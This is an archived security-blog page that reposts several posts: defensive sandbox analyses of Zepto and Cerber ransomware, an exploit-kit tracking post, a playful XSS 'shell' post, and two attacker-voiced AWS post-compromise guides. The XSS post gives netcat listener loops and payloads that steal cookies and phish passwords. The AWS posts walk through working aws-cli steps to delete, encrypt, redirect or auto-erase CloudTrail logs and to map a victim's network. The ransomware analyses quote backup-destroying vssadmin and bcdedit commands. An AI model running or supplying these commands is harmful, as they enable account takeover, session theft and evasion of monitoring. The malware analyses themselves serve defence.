Monthly Archives: July 2016

Infosec Writers

Got a topic you've become very knowledgeable about and would like to share your expertise? Want to add to the cumulative knowledge base of InfoSec/NetSec? You can write and upload your paper(s) to, and if it meets their criteria for suitability, have it published on their site.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file


An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This most indicates a high likelihood that this could either be a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to

Let’s look at the two files in the Temp folder.

This is the binary view of UL43Fok40ii file

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file.  A complete PE file format.

ransomware code processes analysis

Having only a difference of 4 bytes in size of 208,008 bytes and 208,004 bytes suggests that the file without the .exe filename extension was decrypted to form the PE executable file. Afterwards, the PE executable was run by the WSF script with the argument: “321”.

ransomware sandbox analysis


Expanding the Network connections.

ransomware sandbox analysis

ransomware sandbox analysis

With the suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis help me

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.


TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:



This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.


In the manner of searching files, it primarily targets the phone book file before traversing from the root directory of the drive.


Also some notable files that were created. The captured screenshot is the contents of the _HELP_instructions.bmp file.


This malware sample attempts to move its running executable to a file in the Temp folder.


With Chrome set as the default browser,  the malware opens the file _HELP_instructions.html that it previously created in the Desktop.  It also, deletes the malware copy from the Temp folder probably a part of it’s clean up phase.


Here’s what _HELP_instructions.html looks like when opened in a browser.


The process call tree under Chrome.exe are most likely invoked by the browser and not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked by using Windows Scripting Files in hopes to pass through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Fun with XSShell

So this is kinda fun. With this page open, copy and paste one of the listener commands from below into a terminal window on your local machine. Then, paste alert(42) into the resulting shell and press "Enter". Once you recover from the initial shock of what you just witnessed, play with the following payloads and spend the next hour of life thoroughly enjoying yourself.



while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -lp 8000 >/dev/null; done


while :; do printf "j$ "; read c; printf "HTTP/1.1 200 OK\n\n$c" | nc -l 8000 >/dev/null; done

Example Payloads


window.location = ''


i=new Image();i.src=""+prompt("Password:")
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.

Session Hijacking

i=new Image();i.src=""+document.cookie
  • Requires a second listener, e.g. python -m "SimpleHTTPServer" 8888.


d=document;e=d.createElement("p");e.innerHTML="lanmaster53 wuz here!";d.body.appendChild(e)


This is all based on the code shared in the following tweets.

Check the source code here ^^^ for the active payload.

CVE-2016-0189 (Internet Explorer) and Exploit Kit

Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.

Neutrino Exploit Kit :
Here 2016-07-13 but i am being told that i am late to the party.
It's already [CN] documented here

Neutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13

Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd
(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 )

Thanks to Malc0de for invaluable help here :)

Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)

Sundown :
Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznash
On the 16th I recorded a pass where the CVE-2016-0189 had his own calls :

Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16
(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : | )
Files : Sundown_CVE-2016-0189_160716 (password is malware)

I saw it on 2016-09-12 but might have appeared before.
RIG successfully exploiting CVE-2016-0189 - 2016-09-12

CVE-2016-0189 from RIG after 3 step decoding pass

Files : RIG_2016-0189_2016-09-12 (password is malware)

Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)

CVE-2016-0189 in Magnitude on 2016-09-16
Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)

Out of topic Payload:  Cerber

Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071

CVE-2016-0189 in GrandSoft on 2018-01-30
Out of topic Payload:  GandCrab Ransomware

Fiddler here : (pass is malware)

Edits :
2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme
2016-07-20 Adding Sundown.
2016-09-17 Adding RIG
2016-09-19 Adding Magnitude
2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)

Read More :
Patch Analysis of CVE-2016-0189 - 2016-06-22 - Theori
Neutrino EK: fingerprinting in a Flash - 2016-06-28 - Malwarebytes

Post publication Reading :
Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

A Look at the Cerber Office 365 Ransomware

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection is through the use of Office macros.

This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering in general, more often than not, requires that one gets a broad view as to what the target is doing. Whether you’re analyzing a malware sample or trying to figure what a function does from an obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look as to what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating Threat Intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and based on those particular set of behaviors, predict if the program in question is malicious or benign in nature.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig: ThreatAnalyzer’s unique behavior determination engine


Fig 1: ThreatAnalyzer 6.1 in action

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determine that the sample is detected as malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observers the sample trying to beacon to blacklisted URLs
    2. The sample is detected by at least 1 or multiple antivirus engine(s)
    3. Based on the behavior that it performed, has a high probability that the sample is malicious
  2. Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
  3. Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive which includes the detailed report, any significant files that was generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous on opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content

Office 365 Enable Content

Looking at how this ransomware was coded, it will not only infect Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious office attachment is opened. But this is also dependent on whether the macro settings is enabled or in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro

Auto-execution macro inside Cerber macro

The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compare it to a self-generated variable, all the while; this action will be the condition when code to download the cryptor component will ensue.

Using built in network features of VBS; it will attempt to connect to a remote server and attempt to download a particular file.


This may seem harmless as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write whatever the contents of that file, save it to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years ago, this seems interesting.

Download the file, save it, then Run

Download the file, save it, then Run

Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed on a separate blog. It is interesting to note that the downloaded cerber executable will encrypt your files even in the absence of internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it e.g. crytowall, locky, Teslacrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected it will display the following in the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario

Flow of the Cerber attack scenario

  1. A spear-phishing email that contains a malicious Office attachment arrives.
  2. If the user opens the email, executed the attachment AND the macro setting for Office is set to enabled, the macro will execute spawning another VBS script.
  3. The script will contact a remote server, downloads and execute the cryptor part of the Cerber ransomware.
  4. Proceeds on scanning and encrypting the user’s files.
  5. Displays a notice that your system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

Disrupting AWS logging

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? What about that whole cyber kill chain thing; installation, command & control, actions on objectives?

What if someone is watching? Too many questions guy… Let’s just disable logging and move on to the fun stuff.

The main source of log data in AWS are CloudTrails.

You can use AWS CloudTrail to get a history of AWS API calls and related events for your account. This includes calls made by using the AWS Management Console, AWS SDKs, command line tools, and higher-level AWS services.

Let’s check out what CloudTrails are enabled:

aws cloudtrail describe-trails

If you see an empty list, you might want to send your victim a t-shirt and thank them for their participation, kind of like a reverse bug bounty. If you see one or more trails, the fun starts now.

Depending on your mood (and occasionally your pwned account’s access policy), AWS offers a buffet of options. So much so, I used to be indecisive but now I’m not so sure.

Starting with the obvious and loudest, deleting the CloudTrail:

aws cloudtrail delete-trail --name [my-trail]

Only slightly less obvious, disabling logging:

aws cloudtrail stop-logging --name [my-trail]

Your target may be actively monitoring both of those API calls so those tactics are probably best left to nights of drunken regret and forcefully purged with tequila.

Most resources in AWS are region specific. However, CloudTrails are a little different and can be configured to be global. While it’s a default, it’s not super common for a trail bound to a home region, and that makes the setting a perfect target for manipulation. Disabling multi region logging gives you free reign in every region except for the one the trail was created in.

aws cloudtrail update-trail --name [my-trail] --no-is-multi-region-trail --no-include-global-service-events

You may have noticed two flags being unset in the above command. The second also “specifies whether the trail is publishing events from global services such as IAM”, which is handy if you want to say, create some backdoor accounts and API keys. It can only be unset if the first is also unset which is unfortunate for stealthiness.

One of the great things about AWS is they’ve really thought about security. In fact, they’ve created many services specifically designed and dedicated to security. For example, the Key Management Service (KMS) tightly integrates with other services to provide almost seamless encryption. It just so happens that integration includes CloudTrail.

It’s a little bit more effort to get CloudTrail encryption bootstrapped but it’s well worth it. Once enabled, log files will be encrypted but everything else will look normal; configuration will remain almost identical and log files will continue to be delivered to the correct location, in the expected structure.

First, let’s setup a policy file for a new key, ensuring it only allows encryption by CloudTrail and nothing else — we don’t want those pesky administrators using it for decryption. Note the references to [account-id] which have to be replaced as appropriate.

AWS policies default to deny rules so this policy also denies its own deletion. While not useful, its a painful kick to the nether regions requiring manual Support intervention.

Create a key, attaching the policy:

aws kms create-key --bypass-policy-lockout-safety-check --policy [file:///my-policy.json]

The “bypass-policy-lockout-safety-check” flag allows you the make the key’s policy immutable after creation, making logging just an exercise in lighting money on fire with disk consumption. You can’t say Amazon didn’t warn you!

Finally, put it all together by encrypting the target trail with the immutable encryption-only key:

aws cloudtrail update-trail --name [my-trail] --kms-key-id [my-key]

While that’s by far the slickest encryption tactic, there are others. You can start encrypting a trail, disable the key and schedule it for deletion. If you aren’t going to disable the key, you can remove the disable and delete actions from the policy to make the key undeletable (it’s a word, trust me).

aws kms disable-key --key-id [my-key]
aws kms schedule-key-deletion --key-id [my-key] --pending-window-in-days 7

The deletion won’t happen for 7 days but the trail won’t be written regardless. Manually inspecting the trail in the AWS web interface won’t show any signs of failure either, unless the vicim is familiar enough with the interface to notice a missing ‘last delivered’ section. However, checking the trail status via cli will show “LatestDeliveryError” as “KMS.DisabledException”.

aws cloudtrail get-trail-status --name [my-trail]

Finally, if you really wanted to be mean, you could set the encryption key to be one hosted in another account you control. The only minor change required to the base tactic is to ensure the “GenerateDataKey*” action includes the source account-id in the condition section.

If you wanted to be even meaner and found out your victim knew you did this mean thing, you could send them an email suggesting they make a one time tax-free donation to get a copy of the key. That’s a joke — ransomware is pure evil and needs to die in a fire but doing it through AWS does add some dramatic effect, no?

CloudTrails are written to S3 buckets so logs can be redirected to a separate account owned by someone else. You know, like… you. Or better yet, a cyber-patsy™ (I thought this blog was cyber free?). The S3 namespace is global and world writable buckets are more plentiful than poop in my kid’s nappies, and that’s saying a lot! More on that at some point in the future (the buckets not the poop).

aws cloudtrail update-trail --name my-trail --s3-bucket-name [cyber-patsy-bucket]

I know what you are thinking. Scrap that, I barely know what I am thinking but this S3 bucket stuff is interesting, right?

Targeting the S3 bucket where logs are being written has some distinct advantages. It’s much stealthier than manipulating a trail directly. It’s also more likely to be an available option in a more restricted account context.

As with encryption keys, it is possible to delete a bucket being used for logging.

aws s3 rb --force [s3://my-bucket]

The results are much the same with the exception that the failure is very visible when the affected trail is viewed in the AWS web console.

Similarly, it’s possible to update the bucket policy to prevent CloudTrail from writing to it. Simply delete the “AWSCloudTrailWrite20150319” section of the default generated policy.

Then write the policy to the bucket.

aws s3api put-bucket-policy --bucket [my-trail] --policy [file:///my-policy.json]

Again, logging will stop and the web console will display a policy error when viewing the affected trail.

I did attempt to abuse bucket ACLs — these are separate from policies, not sure why — but came up with nothing. It seems even removing the owners ACL wasn’t effective as it could simply be reinstated by the bucket owner.

One of the stealthiest but riskiest options to disrupt logging is to manipulate the target bucket’s lifecycle policy. Buckets can be configured to automatically delete objects after one (or more) days.

aws s3api put-bucket-lifecycle-configuration \
--bucket [my-bucket] \
--lifecycle-configuration [file://s3-lifecycle-config.json]

It’s unlikely this tactic will be monitored however log files will still live one day and any external ingestion of those files to a SIEM is likely to proceed unimpeded.

There’s an elephant in the room. Have you seen it? Simply deleting the log files immediately once they are written hasn’t been mentioned. That’s because AWS is awesome provides an automated mechanism infinitely better than manually deleting the files and I left it till last. Introducing AWS Lambda.

AWS Lambda is a compute service where you can upload your code to AWS Lambda and the service can run the code on your behalf using AWS infrastructure. After you upload your code and create what we call a Lambda function, AWS Lambda takes care of provisioning and managing the servers that you use to run the code. You can use AWS Lambda as … an event-driven compute service where AWS Lambda runs your code in response to events, such as changes to data in an Amazon S3 bucket...

Setting up a Lambda function to immediately delete anything written to an S3 bucket is a little louder and more involved than any other tactic discussed, but it’s worth it. Because the Lambda function is invoked directly by S3, it will win any race against other code attempting to consume files written to the bucket, effectively making them invisible.

To get it going, create a role that can be assumed by Lambda.

aws iam create-role \
--role-name [lambda_s3_innocent_role] \
--assume-role-policy-document [file:///iam-assume-by-lambda.json]

Create a policy to attach to the role that allows Lambda to delete s3 objects and whatever else you like. You could also update an existing policy for extra stealth.

aws iam create-policy \
--policy-name [lambda_s3_innocent_policy] \
--policy-document [file:///lambda-s3-delete-policy.json]

Attach the policy to the role.

aws iam attach-role-policy \
--role-name [lambda_s3_innocent_role] \
--policy-arn arn:aws:iam::[account-id]:policy/[lambda_s3_innocent_policy]

Create the actual Lambda python function code that will delete an s3 object passed to it every time it is invoked.

Compress the code and register the function.

aws lambda create-function \
--region [region] \
--function-name [innocent_function] \
--zip-file [fileb:///] \
--role arn:aws:iam::[account-id]:role/[lambda_s3_innocent_role] \
--handler [my_code].lambda_handler \
--runtime python2.7 \
--timeout 3 \
--memory-size 128 \

Permit Lambda to be invoked by S3.

aws lambda add-permission \
--function-name [innocent_function] \
--statement-id [my-guid] \
--principal \
--action lambda:InvokeFunction \
--source-arn arn:aws:s3:::[my-bucket]

Configure the bucket to call Lambda every time it creates an object.

aws s3api put-bucket-notification-configuration \
--bucket [my-bucket] \
--notification-configuration [file:///s3-notify-config.json]

Easy, right? Kind of, maybe, at least? There’s more good news though.

The Lambda free tier includes 1M free requests per month and 400,000 GB-seconds of compute time per month.

Unusual billing patterns tip off administrators more often than people would like to admit but this tactic combined with the Lambda free tier conveniently avoids those awkward moments.

This article was written under the assumption you have access to an AWS API key or role with some reasonably broad permissions and an up-to-date installed awscli.

More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article engineers at my workplace implemented mitigations and test for gaps this work identified. Regardless, let’s not fool ourselves, our foes are orders of magnitude smarter than me and probably also know what “orders of magnitude” means precisely. Help?

Go forth and conquer.


Disrupting AWS logging was originally published in Cyber Free on Medium, where people are continuing the conversation by highlighting and responding to this story.


Read the responses to this story on Medium.

Exploring an AWS account post-compromise

So you’ve pwned an AWS account — congratulations — now what? You’re eager to get to the data theft, amirite? Not so fast grasshopper, have you disrupted logging? Choice! Time to look around and understand what you have.

Your instinct is probably to type “whoami” and luckily AWS has an equivalent.

aws sts get-caller-identity

It won’t give you much but it will start painting the picture. The information returned is “not secret” but it can be painful to obtain otherwise. For example, crafting Amazon Resource Names (ARNs) is a key part doing stuff in AWS but account numbers, a constituent part of ARNs, are not typically disclosed outside an account. The identity ARN will also likely have a descriptive role or user name that may give you immediate feel for your access.

"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/root"

From here, there are a number of options depending on your goals.

Most big organisations that utilise AWS will connect their data centres and offices directly to Amazon using the Direct Connect service.

AWS Direct Connect links your internal network to an AWS Direct Connect location over a standard 1 gigabit or 10 gigabit Ethernet fiber-optic cable. One end of the cable is connected to your router, the other to an AWS Direct Connect router. With this connection in place, you can create virtual interfaces directly to the AWS cloud …, bypassing Internet service providers in your network path.

Like other AWS services, there is an API to interact with and it can be extremely revealing. Describing locations will display meta data about any connections.

aws directconnect describe-locations | jq '.locations [] | .locationCode + " " + .locationName'

A typical result will include a list of aliases and physical facility locations.

"MyDC1 N 11600 W, Saratoga Springs, UT 84045"
"MyDC2 7135 S Decatur Blvd, Las Vegas, NV 89118"
"NSADC 1400 Defense Pentagon Washington, DC 20301"

That information has a nice synergy (now there is only ‘information super highway’ on my bingo board) with route table data provided by interrogating the EC2 API.

aws ec2 describe-route-tables | \jq '.RouteTables | .[] | .Routes [] | .GatewayId + " " +  .DestinationCidrBlock' | sort | uniq

You should be able to match locations with the returned IP ranges and later use the matches to tunnel back into data centres or sometimes, even corporate networks. The above command filters out the noise, showing only gateway IDs and destination networks.


Virtual gateways are associated with virtual private clouds (VPCs), which are the network containers used to group resources like EC2 instances and Lambda functions. If you can compromise such a resource or create one in the right VPC, you should be able to route normally through those gateways unless network ACLs prevent it. Listing NACLs is also an EC2 call.

aws ec2 describe-network-acls | jq '.NetworkAcls [] .Entries [] | .Protocol + " " + .RuleAction + " " + .CidrBlock' | sort | uniq

